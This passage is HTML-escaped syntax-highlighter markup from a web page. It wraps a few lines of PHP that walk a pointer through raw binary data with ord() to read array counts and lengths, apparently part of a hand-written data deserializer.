!important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;			&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$arrayCount&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;ord&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$rawData&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$pointer&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-127&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;			&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$pointer&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;++&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-128&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;			&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;for&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$i&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$i&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$arrayCount&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$i&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;++&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-129&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;				&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;substr&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$rawData&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$pointer&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;==&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;ARR&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-130&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;					&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$pointer&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;++&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-131&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;					&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$arrayCount2&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;ord&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$rawData&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$pointer&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-132&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;					&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$pointer&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;++&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-133&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;					&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;for&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$j&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$j&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$arrayCount2&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$j&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;++&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-134&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;						&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$pointer&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;++&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-135&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;						&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$length&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;ord&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$rawData&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) 